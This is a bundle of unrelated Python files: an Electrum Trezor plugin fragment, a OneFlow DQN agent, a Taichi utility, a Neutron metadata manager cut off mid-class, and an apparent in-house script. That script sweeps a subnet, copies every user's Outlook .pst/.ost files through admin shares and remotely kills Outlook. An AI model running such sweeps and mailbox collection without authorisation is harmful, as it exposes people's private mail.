info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = bc_address_to_hash_160(address)
index, xpubs, m = info
if addrtype == ADDRTYPE_P2PKH:
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = self.types.PAYTOADDRESS,
address_n = address_n,
)
elif addrtype == ADDRTYPE_P2SH:
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
script_type = self.types.PAYTOMULTISIG)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = bc_address_to_hash_160(address)
if addrtype == ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype')
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = vout['scriptPubKey'].decode('hex')
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
BrainDQNOneFlow.py
|
import numpy as np
import os
import random
from collections import deque
import oneflow as flow
import oneflow.typing as tp
from threading import Thread, Lock
import threading
# Hyper Parameters:
FRAME_PER_ACTION = 1
GAMMA = 0.99 # decay rate of past observations
OBSERVE = 100. # timesteps to observe before training
EXPLORE = 200000. # frames over which to anneal epsilon
FINAL_EPSILON = 0. # 0.001 # final value of epsilon
INITIAL_EPSILON = 0. # 0.005 # starting value of epsilon
MAX_REPLAY_MEMORY = 50000 # number of previous transitions to remember
BATCH_SIZE = 32 # size of minibatch
UPDATE_TIME = 100
ACTIONS_NUM = 2 # two actions
DEVICE_TAG = "gpu"
DEVICE_NUM = 1
def dataPrep(data):
# at the begining data.shape = (64, 64, 4) or (64, 64, 1)
if data.shape[2] > 1:
mean = np.array([128, 128, 128, 128])
reshaped_mean = mean.reshape(1, 1, 4)
else:
mean=np.array([128])
reshaped_mean = mean.reshape(1, 1, 1)
data = data - reshaped_mean
# convert hwc -> chw
data = np.swapaxes(data, 0, 2)
data = np.swapaxes(data, 1, 2)
data = np.expand_dims(data, axis = 0)
# before return data.shape = (1, 4, 64, 64) or (1, 1, 64, 64)
return data
# get QNet parameters
def getQNetParams(var_name_prefix: str = "QNet",
is_train: bool = True):
weight_init = flow.variance_scaling_initializer(scale = 1.0, mode = "fan_in", distribution = "truncated_normal", data_format = "NCHW")
bias_init = flow.constant_initializer(value = 0.)
conv_prefix = "_conv1"
conv1_weight = flow.get_variable(
var_name_prefix + conv_prefix + "_weight",
shape = (32, 4, 3, 3),
dtype = flow.float32,
initializer = weight_init,
trainable = is_train
)
conv1_bias = flow.get_variable(
var_name_prefix + conv_prefix + "_bias",
shape = (32,),
dtype = flow.float32,
initializer = bias_init,
trainable = is_train
)
conv_prefix = "_conv2"
conv2_weight = flow.get_variable(
var_name_prefix + conv_prefix + "_weight",
shape = (32, 32, 3, 3),
dtype = flow.float32,
initializer = weight_init,
trainable = is_train
)
conv2_bias = flow.get_variable(
var_name_prefix + conv_prefix + "_bias",
shape = (32,),
dtype = flow.float32,
initializer = bias_init,
trainable = is_train
)
fc_prefix = "_fc1"
fc1_weight = flow.get_variable(
var_name_prefix + fc_prefix + "_weight",
shape = (512, 32 * 16 * 16),
dtype = flow.float32,
initializer = weight_init,
trainable = is_train
)
fc1_bias = flow.get_variable(
var_name_prefix + fc_prefix + "_bias",
shape = (512,),
dtype = flow.float32,
initializer = bias_init,
trainable = is_train
)
fc_prefix = "_fc2"
fc2_weight = flow.get_variable(
var_name_prefix + fc_prefix + "_weight",
shape = (ACTIONS_NUM, 512),
dtype = flow.float32,
initializer = weight_init,
trainable = is_train
)
fc2_bias = flow.get_variable(
var_name_prefix + fc_prefix + "_bias",
shape = (ACTIONS_NUM,),
dtype = flow.float32,
initializer = bias_init,
trainable = is_train
)
return conv1_weight, conv1_bias, conv2_weight, conv2_bias, fc1_weight, fc1_bias, fc2_weight, fc2_bias
def createOfQNet(input_image: tp.Numpy.Placeholder((BATCH_SIZE, 4, 64, 64), dtype = flow.float32),
var_name_prefix: str = "QNet",
is_train: bool = True) -> tp.Numpy:
conv1_weight, conv1_bias, conv2_weight, conv2_bias, fc1_weight, fc1_bias, fc2_weight, fc2_bias = \
getQNetParams(var_name_prefix = var_name_prefix, is_train = is_train)
conv1 = flow.nn.compat_conv2d(
input_image,
conv1_weight,
strides = [1, 1],
padding = "same",
data_format = "NCHW"
)
conv1 = flow.nn.bias_add(conv1, conv1_bias, "NCHW")
conv1 = flow.layers.batch_normalization(inputs = conv1, axis = 1, name = "conv1_bn")
conv1 = flow.nn.relu(conv1)
pool1 = flow.nn.max_pool2d(conv1, 2, 2, "VALID", "NCHW", name = "pool1")
conv2 = flow.nn.compat_conv2d(
pool1,
conv2_weight,
strides = [1, 1],
padding = "same",
data_format = "NCHW"
)
conv2 = flow.nn.bias_add(conv2, conv2_bias, "NCHW")
conv2 = flow.layers.batch_normalization(inputs = conv2, axis = 1, name = "conv2_bn")
conv2 = flow.nn.relu(conv2)
pool2 = flow.nn.max_pool2d(conv2, 2, 2, "VALID", "NCHW", name = "pool2")
# conv3.shape = (32, 32, 16, 16), after reshape become (32, 32 * 16 * 16)
pool2_flatten = flow.reshape(pool2, (BATCH_SIZE, -1))
fc1 = flow.matmul(a = pool2_flatten, b = fc1_weight, transpose_b = True)
fc1 = flow.nn.bias_add(fc1, fc1_bias)
fc1 = flow.layers.batch_normalization(inputs = fc1, axis = 1, name = "fc1_bn")
fc1 = flow.nn.relu(fc1)
fc2 = flow.matmul(a = fc1, b = fc2_weight, transpose_b = True)
fc2 = flow.nn.bias_add(fc2, fc2_bias)
return fc2
def get_train_config():
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float32)
func_config.default_logical_view(flow.scope.consistent_view())
return func_config
def get_predict_config():
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float32)
func_config.default_logical_view(flow.scope.consistent_view())
return func_config
@flow.global_function("train", get_train_config())
def trainQNet(input_image: tp.Numpy.Placeholder((BATCH_SIZE, 4, 64, 64), dtype = flow.float32),
y_input: tp.Numpy.Placeholder((BATCH_SIZE,), dtype = flow.float32),
action_input: tp.Numpy.Placeholder((BATCH_SIZE, 2), dtype = flow.float32)):
with flow.scope.placement(DEVICE_TAG, "0:0-%d" % (DEVICE_NUM - 1)):
out = createOfQNet(input_image, var_name_prefix = "QNet", is_train = True)
Q_Action = flow.math.reduce_sum(out * action_input, axis = 1)
cost = flow.math.reduce_mean(flow.math.square(y_input - Q_Action))
learning_rate = 0.0002
beta1 = 0.9
flow.optimizer.Adam(flow.optimizer.PiecewiseConstantScheduler([], [learning_rate]), beta1 = beta1).minimize(cost)
@flow.global_function("predict", get_predict_config())
def predictQNet(input_image: tp.Numpy.Placeholder((BATCH_SIZE, 4, 64, 64), dtype = flow.float32)) -> tp.Numpy:
with flow.scope.placement(DEVICE_TAG, "0:0-%d" % (DEVICE_NUM - 1)):
out = createOfQNet(input_image, var_name_prefix = "QNetT", is_train = False)
return out
# copy QNet parameters to QNetT
@flow.global_function("predict", get_predict_config())
def copyQNetToQnetT():
with flow.scope.placement(DEVICE_TAG, "0:0-%d" % (DEVICE_NUM - 1)):
t_conv1_weight, t_conv1_bias, t_conv2_weight, t_conv2_bias, t_fc1_weight, t_fc1_bias, t_fc2_weight, t_fc2_bias = \
getQNetParams(var_name_prefix = "QNet", is_train = True)
p_conv1_weight, p_conv1_bias, p_conv2_weight, p_conv2_bias, p_fc1_weight, p_fc1_bias, p_fc2_weight, p_fc2_bias = \
getQNetParams(var_name_prefix = "QNetT", is_train = False)
flow.assign(p_conv1_weight, t_conv1_weight)
flow.assign(p_conv1_bias, t_conv1_bias)
flow.assign(p_conv2_weight, t_conv2_weight)
flow.assign(p_conv2_bias, t_conv2_bias)
flow.assign(p_fc1_weight, t_fc1_weight)
flow.assign(p_fc1_bias, t_fc1_bias)
flow.assign(p_fc2_weight, t_fc2_weight)
flow.assign(p_fc2_bias, t_fc2_bias)
class OfBrainDQN:
def __init__(self, args):
# init replay memory
self.replayMemory = deque()
# init some parameters
self.timeStep = 0
self.epsilon = INITIAL_EPSILON
self.trainQNet = trainQNet
self.predictQNet = predictQNet
self.copyQNetToQnetT = copyQNetToQnetT
self.check_point_dir = args.checkpoints_path
self.pretrain_models = args.pretrain_models
self.check_point = flow.train.CheckPoint()
if self.pretrain_models != '':
self.check_point.load(self.pretrain_models)
else:
self.check_point.init()
self.time_step_mutex = Lock()
self.predict_QNet_mutex = Lock()
self.replay_memory_mutex = Lock()
self.train_thread = Thread(target = self.trainQNetwork)
self.thread_started = False
def trainQNetwork(self):
while True:
self.replay_memory_mutex.acquire()
# Step 1: obtain random minibatch from replay memory
minibatch = random.sample(self.replayMemory, BATCH_SIZE)
self.replay_memory_mutex.release()
# state_batch.shape = (BATCH_SIZE, 4, 80, 80)
state_batch = np.squeeze([data[0] for data in minibatch])
action_batch = np.squeeze([data[1] for data in minibatch])
reward_batch = np.squeeze([data[2] for data in minibatch])
next_state_batch = np.squeeze([data[3] for data in minibatch])
# Step 2: calculate y_batch
self.predict_QNet_mutex.acquire()
Qvalue_batch = self.predictQNet(next_state_batch)
self.predict_QNet_mutex.release()
terminal = np.squeeze([data[4] for data in minibatch])
y_batch = reward_batch.astype(np.float32)
terminal_false = terminal == False
if (terminal_false).shape[0] > 0:
y_batch[terminal_false] += (GAMMA * np.max(Qvalue_batch, axis=1))[terminal_false]
# do forward, backward and update parameters
self.trainQNet(state_batch, y_batch, action_batch)
self.time_step_mutex.acquire()
localTimeStep = self.timeStep
self.time_step_mutex.release()
# save network every 100 iterations
if localTimeStep % 100 == 0:
if not os.path.exists(self.check_point_dir):
os.mkdir(self.check_point_dir)
save_path = '%s/network-dqn_of_%d' % (self.check_point_dir, localTimeStep)
if not os.path.exists(save_path):
self.check_point.save(save_path)
if localTimeStep % UPDATE_TIME == 0:
self.predict_QNet_mutex.acquire()
self.copyQNetToQnetT()
self.predict_QNet_mutex.release()
def setInitState(self, observation):
# temp.shape = (1, 4, 80, 80)
temp = dataPrep(np.stack((observation, observation, observation, observation), axis = 2))
self.currentState = temp
def setPerception(self, nextObservation, action, reward, terminal):
# discard the first channel of currentState and append nextObervation
# newState.shape = (1, 4, 80, 80)
newState = np.append(self.currentState[:, 1:, :, :], dataPrep(nextObservation), axis = 1)
self.replay_memory_mutex.acquire()
self.replayMemory.append(
(self.currentState.astype(np.float32), action.astype(np.float32), reward, newState.astype(np.float32), terminal))
self.replay_memory_mutex.release()
if len(self.replayMemory) > MAX_REPLAY_MEMORY:
self.replayMemory.popleft()
if self.timeStep > OBSERVE and not self.thread_started:
# Train the network
self.train_thread.start()
self.thread_started = True
# print info
state = ""
if self.timeStep <= OBSERVE:
state = "observe"
elif self.timeStep > OBSERVE and self.timeStep <= OBSERVE + EXPLORE:
state = "explore"
else:
state = "train"
if self.timeStep % UPDATE_TIME == 0:
print("TIMESTEP", self.timeStep, "/ STATE", state, "/ EPSILON", self.epsilon)
self.currentState = newState
self.time_step_mutex.acquire()
self.timeStep += 1
self.time_step_mutex.release()
def getAction(self):
input_images = np.repeat(self.currentState, BATCH_SIZE, axis = 0).astype(np.float32)
self.predict_QNet_mutex.acquire()
Qvalue = np.squeeze(self.predictQNet(input_images))
self.predict_QNet_mutex.release()
Qvalue = Qvalue[0]
action = np.zeros(ACTIONS_NUM)
action_index = 0
if self.timeStep % FRAME_PER_ACTION == 0:
if random.random() <= self.epsilon:
action_index = random.randrange(ACTIONS_NUM)
action[action_index] = 1
else:
action_index = np.argmax(Qvalue)
action[action_index] = 1
else:
action[0] = 1 # do nothing
# change episilon
if self.epsilon > FINAL_EPSILON and self.timeStep > OBSERVE:
self.epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE
return action
|
util.py
|
import ctypes
import os
import platform
import shutil
import sys
from colorama import Back, Fore, Style
if sys.version_info[0] < 3 or sys.version_info[1] <= 5:
raise RuntimeError(
"\nPlease restart with Python 3.6+\n" + "Current Python version:",
sys.version_info)
ti_core = None
def in_docker():
if os.environ.get("TI_IN_DOCKER", "") == "":
return False
else:
return True
def get_os_name():
name = platform.platform()
# in python 3.8, platform.platform() uses mac_ver() on macOS
# it will return 'macOS-XXXX' instead of 'Darwin-XXXX'
if name.lower().startswith('darwin') or name.lower().startswith('macos'):
return 'osx'
elif name.lower().startswith('windows'):
return 'win'
elif name.lower().startswith('linux'):
return 'linux'
assert False, "Unknown platform name %s" % name
def import_ti_core():
global ti_core
if get_os_name() != 'win':
old_flags = sys.getdlopenflags()
sys.setdlopenflags(2 | 8) # RTLD_NOW | RTLD_DEEPBIND
else:
pyddir = os.path.join(package_root(), 'lib')
os.environ['PATH'] += ';' + pyddir
try:
import taichi_core as core
except Exception as e:
if isinstance(e, ImportError):
print(Fore.YELLOW + "Share object taichi_core import failed, "
"check this page for possible solutions:\n"
"https://docs.taichi.graphics/lang/articles/misc/install" +
Fore.RESET)
if get_os_name() == 'win':
e.msg += '\nConsider installing Microsoft Visual C++ Redistributable: https://aka.ms/vs/16/release/vc_redist.x64.exe'
elif get_os_name() == 'linux':
e.msg += '\nConsider installing libtinfo5: sudo apt-get install libtinfo5'
raise e from None
ti_core = core
if get_os_name() != 'win':
sys.setdlopenflags(old_flags)
lib_dir = os.path.join(package_root(), 'lib')
core.set_lib_dir(locale_encode(lib_dir))
def locale_encode(path):
try:
import locale
return path.encode(locale.getdefaultlocale()[1])
except:
try:
import sys
return path.encode(sys.getfilesystemencoding())
except:
try:
return path.encode()
except:
return path
def is_ci():
return os.environ.get('TI_CI', '') == '1'
def package_root():
return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../')
def get_core_shared_object():
directory = os.path.join(package_root(), 'lib')
return os.path.join(directory, 'libtaichi_core.so')
def print_red_bold(*args, **kwargs):
print(Fore.RED + Style.BRIGHT, end='')
print(*args, **kwargs)
print(Style.RESET_ALL, end='')
def check_exists(src):
if not os.path.exists(src):
raise FileNotFoundError(
f'File "{src}" not exist. Installation corrupted or build incomplete?'
)
def get_unique_task_id():
import datetime
import random
return datetime.datetime.now().strftime('task-%Y-%m-%d-%H-%M-%S-r') + (
'%05d' % random.randint(0, 10000))
sys.path.append(os.path.join(package_root(), 'lib'))
import_ti_core()
ti_core.set_python_package_dir(package_root())
os.makedirs(ti_core.get_repo_dir(), exist_ok=True)
log_level = os.environ.get('TI_LOG_LEVEL', '')
if log_level:
ti_core.set_logging_level(log_level)
def get_dll_name(name):
if get_os_name() == 'linux':
return 'libtaichi_%s.so' % name
elif get_os_name() == 'osx':
return 'libtaichi_%s.dylib' % name
elif get_os_name() == 'win':
return 'taichi_%s.dll' % name
else:
raise Exception(f"Unknown OS: {get_os_name()}")
def at_startup():
ti_core.set_core_state_python_imported(True)
def start_memory_monitoring(output_fn, pid=-1, interval=1):
# removing dependency on psutil
return
import os
import time
import psutil
if pid == -1:
pid = os.getpid()
import multiprocessing
def task():
with open(output_fn, 'w') as f:
process = psutil.Process(pid)
while True:
try:
mem = process.memory_info().rss
except:
mem = -1
time.sleep(interval)
print(time.time(), mem, file=f)
f.flush()
proc = multiprocessing.Process(target=task, daemon=True)
proc.start()
def require_version(major, minor=None, patch=None):
versions = [
int(ti_core.get_version_major()),
int(ti_core.get_version_minor()),
int(ti_core.get_version_patch()),
]
match = major == versions[0] and (
minor < versions[1] or minor == versions[1] and patch <= versions[2])
if match:
return
else:
print("Taichi version mismatch. required >= {}.{}.{}".format(
major, minor, patch))
print("Installed =", ti_core.get_version_string())
raise Exception("Taichi version mismatch")
at_startup()
def _print_taichi_header():
header = '[Taichi] '
header += f'version {ti_core.get_version_string()}, '
llvm_version = ti_core.get_llvm_version_string()
header += f'llvm {llvm_version}, '
commit_hash = ti_core.get_commit_hash()
commit_hash = commit_hash[:8]
header += f'commit {commit_hash}, '
header += f'{get_os_name()}, '
py_ver = '.'.join(str(x) for x in sys.version_info[:3])
header += f'python {py_ver}'
print(header)
_print_taichi_header()
__all__ = [
'ti_core',
'get_os_name',
'start_memory_monitoring',
'package_root',
'require_version',
]
|
CompanyOutlookBackup.py
|
# from/import for portability
from psutil import process_iter
from shutil import copyfile
from os import path, makedirs, system, remove
from socket import *
from glob import glob
from pathlib import Path
from multiprocessing import Process
from datetime import datetime,date
from time import sleep
from contextlib import suppress
# pyinstaller -F -I=TMF.ico CompanyOutlookBackup.py
# Each of the users in a dict of their logon(key)
# and the name of their backup drive folder(value)
# Use individual backup folders because most people
# have named their .pst files Outlook.pst
userKeyDict = {
'jwayne': 'John',
'drenalds': 'Dennis',
'deerenalds': 'Dee',
'frenalds': 'Frank',
'ckelly': 'Charlie',
'rmcdonald': 'Mac',
'zvanmeter': 'Zach'
}
floorKeyList = [ # These users are on shared computers, or Userless computers
'weld',
'intg',
'mill',
'inspect',
'cnc',
'shipping',
'lathe',
'receiving',
'tool',
'troya',
'maint',
'saw',
'toolcrib',
'cps',
'tblanton',
]
deviceDict = {
'ex304':'',
'ex311':'',
'ex319':'',
'ex325':'',
'ex326':'',
'ex327':'',
'ex329':'',
'ex368':'',
'ex374':'',
'ext300':'',
'ext306':'',
'ext307':'',
'ext308-1':'',
'ext309':'',
'ext312':'',
'ext314':'',
'ext316':'',
'ext317':'',
'ext318':'',
'ext320':'',
'ext321':'',
'ext325':'',
'ext326':'',
'ext326-1':'',
'ext330-2':'',
'ext331':'',
'ext332':'',
'ext336':'',
'ext355':'',
'ext355-1':'',
'ext367':'',
'ext370':'',
'ext373':'',
'cmmcnc':'',
'cmmlarge':'',
'cnc18':'',
'cps':'',
'epicor356':'',
'intg14':'',
'lathe17':'',
'maint15':'',
'mill18':'',
'receiving14':'',
'saw18':'',
'shipping14':'',
'toolcrib':'',
'weld14':'',
'ext425':'dummy value', # Cant ping Plant II for some reason
}
def CopyPst(pathDir,DoCopy,FilePathList):
def reverseDict(pathDir):
deviceName, loginUser = ParsePath(pathDir)
#print(pathDir) # all .pst files
if loginUser in userKeyDict:
#print(pathDir) # all user .pst files
dst = GenDst('',deviceName,userKeyDict[loginUser],'\\\\tmfsvr7\\Users\\%s'%(userKeyDict[loginUser]),pathDir)
return userKeyDict[loginUser], dst, deviceName
else:
#print(pathDir) # all leftover .pst files
dstDir = '\\\\tmfsvr7\\Users\\Floor Backups' if loginUser in floorKeyList else '\\\\tmfsvr7\\Users\\All Leftover Email Backups'
_,_,filename = pathDir.rpartition('\\')
dst = GenDst('%s %s'%(loginUser,filename),deviceName,loginUser,dstDir,pathDir)
return loginUser, dst, deviceName
def ParsePath(pathDir):
RplStr = '\\Users\\' if '\\Users\\' in pathDir else '\\Documents and Settings\\'
deviceName,_,tail = pathDir.partition(RplStr)
loginUser, _,tail = tail.partition('\\')
return deviceName.replace('\\c$',''), loginUser.lower()
def GenDst(filename,deviceName,dstUser,dstDir,pathDir): # Format Destination .pst file
if filename == '':
newfilepath = "\\\\tmfsvr7\\Users\\%s\\Email Backups\\"%(dstUser)
_,_, filename = pathDir.replace('.pst','').rpartition('\\')
return ('%s Backup %s %s.pst')%(newfilepath+filename,str(date.today().year),str(date.today().month))
else: return dstDir+'\\%s %s\\'%(deviceName, dstUser)+filename
# ############################################################ #
dstUser, dst, deviceName = reverseDict(pathDir)
if DoCopy == 'Floor' and not 'floor' in dst.lower(): return
if DoCopy == 'Test': print('Copy: '+pathDir+'\nTo: '+dst)
if not path.isfile(dst):
Process(target=CloseOutlook, args=(deviceName,)).start()
Process(target=DoCopyBit, args=(dst,pathDir,dstUser,FilePathList)).start()
print('Copying', dst)
else: print('Already Done:', dst)
def CloseOutlook(deviceName): system("taskkill /s "+deviceName+" /u zvanmeter /FI \"IMAGENAME eq OUTLOOK.EXE\"")
def DoCopyBit(dst,pathDir,dstUser,FilePathList):
with suppress(FileExistsError):
filepath,_,_ = dst.rpartition('\\')
makedirs(filepath)
try:
sleep(5)
copyfile(pathDir, dst)
msg = datetime.strftime(datetime.now(),'%d/%m, %H:%M')+' Backup Successful: '+pathDir
except Exception as e:
msg = datetime.strftime(datetime.now(),'%d/%m, %H:%M')+' Backup Failed: '+pathDir+' '+str(e)
if path.isfile(dst): remove(dst)
print(msg)
with open(FilePathList[2], 'a') as f:
f.write(msg+'\n')
def GenPstList(Deepscan): # Find all .pst files in the domain
def is_up(addr): # Simple ping script
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(0.01)
with suppress(gaierror):
if not s.connect_ex((addr,135)): # connect to the remote host on port 135
s.close()
return 1
s.close()
def GenDeviceMap(Deepscan):
for ip in range(1,256 if Deepscan==0 else 501):
addr = '192.168.1.'+str(ip)
if is_up(addr): # If the ping is good, lets format our device map dictionary
deviceName = getfqdn(addr).replace('.tmfdomain.local','').replace('.TMFDOMAIN.local','')
if Deepscan == 1:
deviceDict[deviceName] = addr
else:
for key, value in deviceDict.items():
if key.upper() == deviceName.upper():
deviceDict[key] = addr
return deviceDict
pathDirDict = {}
for deviceName, CompIP in GenDeviceMap(Deepscan).items():
if not CompIP == '':
for PstPath in [ # These three locations are the only locations we've ever found .pst files in
'\\\\%s\\c$\\Users\\*\\Documents\\Outlook Files\\' % (deviceName),
'\\\\%s\\c$\\Users\\*\\AppData\\Local\\Microsoft\\Outlook\\' % (deviceName),
'\\\\%s\\c$\\Documents and Settings\\*\\\Local Settings\Application Data\Microsoft\Outlook\\' % (deviceName),
]:
for item in glob(PstPath+'*.ost'):
pathDirDict[item] = CompIP
for item in glob(PstPath+'*.pst'):
pathDirDict[item] = CompIP
return pathDirDict
def Main(FilePathList,DoCountDown=1,DoCopy=1,AllPsts=[]):
def CountDown():
if DoCountDown == 1:
target = '00:01'
while True:
sleep(1)
now = datetime.strftime(datetime.now(),'%H:%M')
print(now, target,end="\r")
if now == target: return
print('The countdown has been skipped.')
def LogData(pathDir,FilePathList): # Generate list of psts to check against
pathDir = pathDir.lower()
with open(FilePathList[0],'r') as f:
lines = f.readlines()
if not pathDir+'\n' in lines:
print('Logging New Pst: '+pathDir)
with open(FilePathList[0],'a') as f:
f.write(pathDir+'\n')
def CheckRecordedPsts(AllPsts,FilePathList): # Now we check to see if we backed up everything we expected to
with open(FilePathList[0],'r') as f:
lines = f.readlines()
print('Found: %s/%s'%(len(AllPsts),len(lines)))
with open(FilePathList[1],'a') as f:
for line in lines:
if not line in AllPsts:
print('We couldnt find: '+line.replace('\n',''))
f.write(str(date.today())+','+line)
# ############################################################ #
Path(FilePathList[2]).touch()
CountDown()
Deepscan = 1 if DoCopy == 'Dpscn' else 0
print('We\'re doing this for real, hide your outlook, hide your wife. cause we backing up everything out here')
for pathDir, _ in GenPstList(Deepscan).items():
AllPsts.append(pathDir.lower()+'\n')
try:
if DoCopy == 1: CopyPst(pathDir,DoCopy,FilePathList)
elif DoCopy == 'Floor': CopyPst(pathDir,DoCopy,FilePathList)
elif DoCopy == 'Test' and 'ex326' in pathDir: CopyPst(pathDir,DoCopy,FilePathList)
elif DoCopy == 'Dpscn': print(pathDir)
LogData(pathDir,FilePathList)
except Exception as e: print(e)
CheckRecordedPsts(AllPsts,FilePathList)
if DoCopy == 1: input('Press Enter to close\n')
if __name__ == '__main__':
LocalDirectory = '\\\\TMFSVR7\\Users\\Zach\\Script Backups\\Python Scripts\\Outlook Backup\\'
FilePathList = [
LocalDirectory+'List of All PSTs.txt',
LocalDirectory+'Files we Missed.txt',
LocalDirectory+'Log.txt'
]
DoCopyOptions = [
0, #0 # Do not Copy
1, #1 # Proceed with no special conditions
'Floor', #2 # Only Copy Floor Dict
'Test', #3 # Target Specific Computers
'Dpscn' #4 # Run a single iteration
]
Main(FilePathList,DoCountDown=0,DoCopy=DoCopyOptions[1])
|
as_metadata_manager.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import hashlib
import json
import multiprocessing
import os
import os.path
import signal
import subprocess
import sys
import time
import uuid
import netaddr
import pyinotify
from six.moves import queue as Queue
from neutron.common import config as common_config
from neutron.common import utils
from neutron.conf.agent import common as config
from neutron.plugins.ml2.drivers.openvswitch.agent.common import ( # noqa
config as ovs_config)
from neutron_lib.utils import helpers
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import encodeutils
from opflexagent._i18n import _
from opflexagent import config as oscfg # noqa
from opflexagent.utils import utils as opflexagent_utils
LOG = logging.getLogger(__name__)
gbp_opts = [
cfg.StrOpt('epg_mapping_dir',
default='/var/lib/opflex-agent-ovs/endpoints/',
help=_("Directory where the EPG port mappings will be "
"stored.")),
cfg.StrOpt('as_mapping_dir',
default='/var/lib/opflex-agent-ovs/services/',
help=_("Directory where the anycast svc mappings will be "
"stored.")),
cfg.StrOpt('opflex_agent_dir',
default='/var/lib/neutron/opflex_agent',
help=_("Directory where the opflex agent state will be "
"stored.")),
]
EP_FILE_EXTENSION = "ep"
AS_FILE_EXTENSION = "as"
AS_FILE_NAME_FORMAT = "%s." + AS_FILE_EXTENSION
AS_MAPPING_DIR = "/var/lib/opflex-agent-ovs/services"
EOQ = 'STOP'
MD_DIR = "/var/lib/neutron/opflex_agent"
MD_DIR_OWNER = "neutron:neutron"
MD_SUP_FILE_NAME = "metadata.conf"
SVC_IP_DEFAULT = "169.254.1.2"
SVC_IP_BASE = 0xA9FEF003
SVC_IP_SIZE = 1000
SVC_IP_CIDR = 16
SVC_NEXTHOP = "169.254.1.1"
SVC_NS = "of-svc"
SVC_NS_PORT = "of-svc-nsport"
SVC_OVS_PORT = "of-svc-ovsport"
PID_DIR = "/var/lib/neutron/external/pids"
PID_FILE_NAME_FORMAT = PID_DIR + "/%s.pid"
PROXY_FILE_EXTENSION = "proxy"
PROXY_FILE_NAME_FORMAT = "%s." + PROXY_FILE_EXTENSION
SNAT_FILE_EXTENSION = "snat"
SNAT_FILE_NAME_FORMAT = "%s." + SNAT_FILE_EXTENSION
STATE_ANYCAST_SERVICES = "anycast_services"
STATE_INSTANCE_NETWORKS = "instance_networks"
STATE_FILE_EXTENSION = "state"
STATE_FILE_NAME_FORMAT = "%s." + STATE_FILE_EXTENSION
STATE_FILENAME_SVC = STATE_FILE_NAME_FORMAT % STATE_ANYCAST_SERVICES
STATE_FILENAME_NETS = STATE_FILE_NAME_FORMAT % STATE_INSTANCE_NETWORKS
def read_jsonfile(name):
retval = {}
try:
with open(name, "r") as f:
retval = json.load(f)
except Exception as e:
LOG.warn("Exception in reading file: %s", str(e))
return retval
def write_jsonfile(name, data):
try:
with open(name, "w") as f:
json.dump(data, f)
except Exception as e:
LOG.warn("Exception in writing file: %s", str(e))
class AddressPool(object):
def __init__(self, base, size):
self.base = base
self.size = size
self.ips = {}
for i in range(size):
self.ips[self.base + i] = True
def reserve(self, ip):
del self.ips[ip]
def get_addr(self):
for i in self.ips:
self.reserve(i)
return i
return None
class FileProcessor(object):
def __init__(self, watchdir, extensions, eventq, processfn):
self.watchdir = watchdir
self.extensions = extensions
self.eventq = eventq
self.processfn = processfn
def scanfiles(self, files):
LOG.debug("FileProcessor: processing files: %s", files)
relevant_files = []
for (action, filename) in files:
if all(not filename.endswith(ext) for ext in self.extensions):
continue
relevant_files.append((action, filename))
LOG.debug("FileProcessor: relevant files %s", relevant_files)
return self.processfn(relevant_files)
def scan(self):
LOG.debug("FileProcessor: initial scan")
files = []
for filename in os.listdir(self.watchdir):
files.append(("update", filename))
self.scanfiles(files)
return
def run(self):
self.scan()
try:
connected = True
while connected:
files = []
event = self.eventq.get()
while event is not None:
# drain all events in queue and batch them
LOG.debug("FileProcessor: event: %s", event)
if event == EOQ:
connected = False
event = None
break
action = "update"
if event.maskname == "IN_DELETE" or \
event.maskname == "IN_MOVED_FROM":
action = "delete"
files.append((action, event.pathname))
try:
event = self.eventq.get_nowait()
except Queue.Empty as e:
event = None
if files:
# process the batch
self.scanfiles(files)
except KeyboardInterrupt:
pass
except Exception as e:
LOG.warn("FileProcessor: Exception: %s", str(e))
return
class EventHandler(pyinotify.ProcessEvent):
def my_init(self, watcher, extensions):
self.watcher = watcher
self.extensions = extensions
self.events = \
pyinotify.IN_CLOSE_WRITE | \
pyinotify.IN_MOVED_FROM | \
pyinotify.IN_MOVED_TO | \
pyinotify.IN_DELETE
def action(self, event):
if all(not event.pathname.endswith(ext)
for ext in self.extensions):
return
return self.watcher.action(event)
process_IN_CLOSE_WRITE = action
process_IN_MOVED_FROM = action
process_IN_MOVED_TO = action
process_IN_DELETE = action
class FileWatcher(object):
def __init__(self, watchdir, extensions, name="Not Specified"):
self.name = name
self.watchdir = watchdir
self.extensions = extensions.split(',')
self.eventq = multiprocessing.Queue()
